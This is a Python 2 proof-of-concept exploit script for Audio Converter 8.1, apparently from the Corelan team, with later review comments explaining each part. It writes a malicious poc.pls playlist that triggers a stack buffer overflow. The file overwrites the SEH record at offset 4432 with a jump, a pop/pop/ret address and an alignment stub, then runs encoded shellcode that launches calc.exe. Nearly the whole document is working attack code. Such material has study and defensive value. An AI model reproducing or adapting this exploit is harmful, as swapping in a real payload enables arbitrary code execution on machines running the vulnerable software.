#***********************************************************************************
# Exploit Title : Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit
# Date: 16/05/2010
# Author: Sud0
# Bug found by: chap0
# Software Link : http://download.cnet.com/Audio-Converter/3000-2140_4-10045287.html
# Version : 8.1
# OS: Windows
# Tested on : XP SP3 En (VirtualBox)
# Type of vuln: SEH
# Thanks to my wife for her support
# Thanks for chap0 for bringing us the game
# Greetz to: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#***********************************************************************************
#code :

# NOTE(review): this is Python 2 source (`print` statements, str payloads); it does
# not run under Python 3 as written.
# NOTE(review): the banner literals below were damaged by the page rendering — the
# ASCII-art whitespace is collapsed and the `<code>`/`</code>` fragments are almost
# certainly backticks turned into markup. They are kept exactly as extracted; they
# are cosmetic output only and do not affect the generated file.
print "|------------------------------------------------------------------|\n"; print "| __ __|\n"; print "| _________________/ /___ _____ / /________ _____ ___|\n"; print "|/ ___/ __ \\/ ___/ _ \\/ / __ <code>/ __ \\ / __/ _ \\/ __ </code>/ __ `__ \\ |\n"; print "| / /__/ /_/ / //__/ / /_/ / / / // /_/__/ /_/ / / / / / / |\n"; print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/|\n"; print "||\n"; print "| http://www.corelan.be:8800 |\n"; print "||\n"; print "|-------------------------------------------------[ EIP Hunters ]--|\n\n"; print "[+] Exploit for .... \n";

# NOTE(review): `socket` is imported but never used — the script performs no
# network I/O; its only side effect is writing poc.pls into the current directory.
import socket

# Payload layout (from the author's notes and the arithmetic below):
#   shell (alphanumeric encoded shellcode)  + junk filler  -> exactly 4432 bytes
#   nseh (4 bytes)  + seh (4 bytes)                         -> the overwritten SEH record
#   20 x 0x90  + align (5 bytes)  + 10000 x "A"             -> trailing padding
# Total file size: 4432 + 4 + 4 + 20 + 5 + 10000 = 14465 bytes.
# For analysts: the resulting .pls file is a single ~14.5 KB blob made almost
# entirely of printable filler ("B"/"A") around a handful of non-printable bytes;
# the author's comments name the technique as an SEH overwrite.

#shellcode running calc.exe alpha2 encoded basereg edx
# Author's note above: the payload is alpha2-encoded (every byte of the literal is a
# letter or digit) and expects the base register to be edx, which is why the
# `align` stub below ends in a jump through edx.
shell="JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIlKXlpUnkxlqx7P7PQ0fOrHpcparLQsLMaUzXPPNXKwOcxBCGKOZpA"
# Filler sized so that shell + junk is exactly 4432 bytes, the offset at which the
# author observed the SEH record being overwritten.
junk="B" * (4432 - len(shell))#seh overwritten after 4432 bytes
# Next-SEH field: the author describes these bytes as a short forward jump (repeated
# so the 4-byte slot is filled).
nseh= "\xEB\x06\xEB\x06" # jmp forward
# SEH handler field: little-endian 0x10038EF1. Per the author's note this is a
# pop/pop/ret ("ppr") sequence located in a module of the target application
# itself, i.e. the handler address is taken from the vulnerable program's own
# image rather than from a system DLL.
seh= "\xF1\x8E\x03\x10" # nice ppr from audioconv
# Author's decode of the stub: three `popad` (0x61) followed by `jmp edx`
# (0xFF 0xE2), which transfers control to the encoded shellcode's base register.
align="\x61\x61\x61\xff\xE2" # popad / popad / popad / jmp edx
# Assemble the full file body; the 20 NOPs sit between the SEH record and the
# alignment stub (the author's "nops after seh").
buffer= shell + junk + nseh + seh + "\x90" * 20 + align+ "A"* 10000#added some nops after seh
# NOTE(review): the file is opened in text mode ('w', not 'wb'). On Windows that
# translates any 0x0A byte to 0x0D 0x0A on write; none of the bytes assembled above
# is 0x0A, so the output here is byte-for-byte `buffer`, but the handle should be
# closed via `with` and opened in binary mode for a byte payload. No error handling
# around the file write.
mefile = open('poc.pls','w'); mefile.write(buffer); mefile.close()